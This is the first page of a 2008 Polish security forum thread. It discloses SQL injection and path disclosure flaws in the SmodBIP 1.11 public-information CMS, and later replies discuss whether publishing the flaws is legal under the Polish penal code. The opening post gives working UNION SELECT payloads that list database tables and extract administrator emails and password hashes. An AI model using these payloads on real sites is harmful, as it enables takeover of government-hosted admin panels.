Strona 1 z 3 123 OstatniOstatni
Pokaż wyniki 1 do 10 z 21

Temat: [bugtraq] SmodBIP v.1.11 - Multiple Remote Vulnerabilities

  1. #1
    Zarejestrowany
    Apr 2008
    Skąd
    Rybnik
    Postów
    21

    Domyślnie [bugtraq] SmodBIP v.1.11 - Multiple Remote Vulnerabilities

    Na atak poddatna jest najnowsza wersja SmodBIP jak i również wersja 1.10. Nie wiem jak sprawa ma się z niższymi.

    SQL INJECTION
    Kod:
    index.php?id=11&roks=[sql injection]
    
    index.php?id=11&zoom=[sql injection]
    FULL PATH DISCLOSURE
    Kod:
    php/auctionlook.php
    php/foot.php
    php/menu.php
    php/redakcja.php
    php/sitemap.php
    php/stat.php
    php/top.php
    php/top_menu.php
    php/winieta.php
    
    edytor/php/foot.php
    edytor/php/ses.php
    edytor/php/top.php

    Przykladowe wykorzystanie:
    Kod:
    index.php?id=11&zoom=0 union select 1,2,3,4,5,6,7,8,9,0,0 /*
    
    index.php?id=11&roks=0 union select 1,2,3,4,5,6,7,8,9,0,0 /*
    Kod:
    index.php?id=11&zoom=0 union select 1,2,3,table_name,5,6,7,8,9,0,0 from INFORMATION_SCHEMA.TABLES /*
    ^^ W ten sposob mozemy dowiedziec sie jakie tabele znajduja w bazie danych.

    Kod:
    index.php?id=11&zoom=0 or 1=1 union select 1,Email,3,haslo,5,6,7,8,9,0,0 from bip_SmodBIP_admin /*
    ^ Przykladowe zapytanie wyciagajace z tabeli "bip_SmodBIP_admin" adres e-mail (ktory jest potrzebny do zalogowania sie do panelu administracyjnego) oraz hasło zhaszowane w md5.

    Zagrozenie?
    Bardzo duże. W kilka chwil wprawiony atakujacy może uzyskac dostep do panelu administracyjnego.

    Warto dodać ze skrypt obsluguje kilkanaście BIPów, w domenach rządowych.
    Autor został skryptu powiadomiony.

    Btw, czy w świetle prawa, publikując coś takiego łamię prawo?


    Serdecznie pozdrawiam,
    Adrian Piętka
    Ostatnio edytowane przez AdrianPietka : 05-13-2008 - 13:33

  2. #2
    Avatar GSG-9
    GSG-9 jest offline Shapeshifter
    Zarejestrowany
    Jul 2007
    Skąd
    C:\Perl\bin
    Postów
    1,578

    Domyślnie

    no i co w zwiazku z tym?
    nie rozumiem 'przeslania' powyzszej wiadomosci
    Ostatnio edytowane przez GSG-9 : 05-07-2008 - 14:38
    War, war never changes.

  3. #3
    Zarejestrowany
    Dec 2007
    Postów
    136

    Domyślnie

    huhuhu, ciekawe, ciekawe. sam to ogarnales czy masz info od kogos/skads? najzabawniejsze jest to ze i tak nie umialbym z tego skorzystac .

    ps. z tego co mi sie zdaje(ale moge sie mylic) w pl samo publikowanie takich informacji nie jest nielegalne, tymbardziej ze admin jest juz powiadomiony. ale jesli w tekscie naklaniasz do wlamu albo to sugerujesz moga cie pociagnac za namowe do przestepstwa a za to chyba mozna nawet do ok. 3-4 lat wyhaczyc

  4. #4
    Zarejestrowany
    Mar 2007
    Skąd
    toronto
    Postów
    283

    Domyślnie

    Cytat Napisał AdrianPietka Zobacz post
    Btw, czy w świetle prawa, publikując coś takiego łamię prawo?
    Niestety tak...
    Nie pamietam konkretnych artykulow kodeksu karnego, ale to na pewno mozna podpiac pod pomocnictwo w popelnieniu przestepstwa.
    Wieczorem jeszcze przejrze kodeks i postaram sie napisac cos wiecej bo teraz czas mnie goni.

  5. #5
    Zarejestrowany
    Nov 2006
    Skąd
    Polska/Poland
    Postów
    1,191

    Domyślnie

    jeśli już ktokolwiek powinien być pociągnięty do odpowiedzialności to na pewno nie ten kto odkrył bug.
    congrat. Adrian.
    ***********
    * markossx *
    ***********

  6. #6
    Avatar gogulas
    gogulas jest offline killboy powerhead
    Zarejestrowany
    Sep 2007
    Skąd
    Tu
    Postów
    1,236

    Domyślnie

    Jesli sam to znalazles to respect,
    w przeciwym razie nie wiem jaki jest cel kopiowania milw0rma, chyba ze jakas tworcza dyskusja, wklejenie fregmentu kodu ktory ta podatnosc powoduje i propozycje zalatania...

    co mam niby po przeczytaniu tego posta zrobic? rzucic sie w wir poszukiwania podatnych stronek i czerpac watpliwa przyjemnosc z ich niszczenia? Wole w odwrotna strone, pojawia sie konkreta strona ktora chce popsuc, to szukam na nia bugow.
    http://gogulas.yoyo.pl/h.gif

  7. #7
    Zarejestrowany
    Apr 2008
    Skąd
    Rybnik
    Postów
    21

    Domyślnie

    Cytat Napisał GSG-9
    no i co w zwiazku z tym?
    nie rozumiem 'przeslania' powyzszej wiadomosci
    Anglojęzyczni użytkownicy maja milw0rm, SecurityFocus na których publikują takie bądź podobne informacje. Niestety w Polsce nie mamy żadnej listy bugtraq (nawet ta z cc-teamu umarła jakiś czas temu). Dlatego też informacja powędrowała na forum.

    Cytat Napisał mtbs
    huhuhu, ciekawe, ciekawe. sam to ogarnales czy masz info od kogos/skads? najzabawniejsze jest to ze i tak nie umialbym z tego skorzystac .
    Sam, przeglądając funkcjonalność oraz kod skryptu.

    Cytat Napisał studencik20
    Niestety tak...
    Nie pamietam konkretnych artykulow kodeksu karnego, ale to na pewno mozna podpiac pod pomocnictwo w popelnieniu przestepstwa.
    Wieczorem jeszcze przejrze kodeks i postaram sie napisac cos wiecej bo teraz czas mnie goni.
    Rozumię... Jeśli uda znaleźć Ci się jakieś konkretne informacje w wolnym czasie, to byłbym Ci za nie bardzo wdzięczny


    Cytat Napisał markossx
    jeśli już ktokolwiek powinien być pociągnięty do odpowiedzialności to na pewno nie ten kto odkrył bug.
    congrat. Adrian.
    Również tak myślę, ale nigdy nic nie wiadomo. Chcę być tego w 100% pewny


    Pozdrawiam,
    Adrian Piętka
    Ostatnio edytowane przez AdrianPietka : 05-07-2008 - 15:19

  8. #8
    h3x
    h3x jest offline Banned
    Zarejestrowany
    Dec 2007
    Postów
    271

    Domyślnie

    takie 'skrypty' powstaja chyba celowo...

  9. #9
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    Celowo tzn "broken by design" :-)

    Wiecie, ze brak sprawdzania danych wejsciowych (niewlasciwa ich obsluga a w sumie to brak jakiejkolwiek obslugi) to najczestszy powod wszelkich podmian stron w 2007 roku?
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

  10. #10
    Zarejestrowany
    Mar 2007
    Skąd
    toronto
    Postów
    283

    Domyślnie

    Dobra, nawiazujac jeszcze do tego aspektu prawnego odszukalem co nastepuje:

    Art. 269b. (99) § 1. Kto wytwarza, pozyskuje, zbywa lub udostępnia innym osobom urządzenia lub programy komputerowe przystosowane do popełnienia przestępstwa określonego w art. 165 § 1 pkt 4, art. 267 § 2, art. 268a § 1 albo § 2 w związku z § 1, art. 269 § 2 albo art. 269a, a także hasła komputerowe, kody dostępu lub inne dane umożliwiające dostęp do informacji przechowywanych w systemie komputerowym lub sieci teleinformatycznej,
    podlega karze pozbawienia wolności do lat 3.
    No coz, tylko 3 latka groza
    Wszystko jednak zalezy od interpretacji takiego przepisu przez sedziego.
    Ignorantia iuris nocet czyli nieznajomosc prawa szkodzi, wiec jesli np. staralbys sie
    bronic mowiac, ze nie wiedziales, ze to co robisz jest przestepstwem, to niestety
    nikt nie wezmie tego pod uwage (moze ewentualnie wymierzy nizszy wymiar kary)

    Jesli chodzi o pomocnictwo to sie pomylilem bo tam musialby byc Twoj zamiar aby ktos inny dokonal czynu zabronionego (a sadze, ze takiego zamiaru nie masz...)

    Zgadzam sie rowniez z tym co markossx powiedzial, jednak prawo w Polsce jest takie a nie inne

Strona 1 z 3 123 OstatniOstatni

Podobne wątki

  1. remote shell w SP2 ?
    By gogulas in forum Hacking
    Odpowiedzi: 5
    Autor: 11-25-2007, 12:38
  2. Odpowiedzi: 2
    Autor: 11-12-2007, 15:14
  3. Remote PC , Hack Shop CFM and Check CC Here
    By theworld in forum Tutoriale
    Odpowiedzi: 2
    Autor: 10-10-2007, 10:44

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj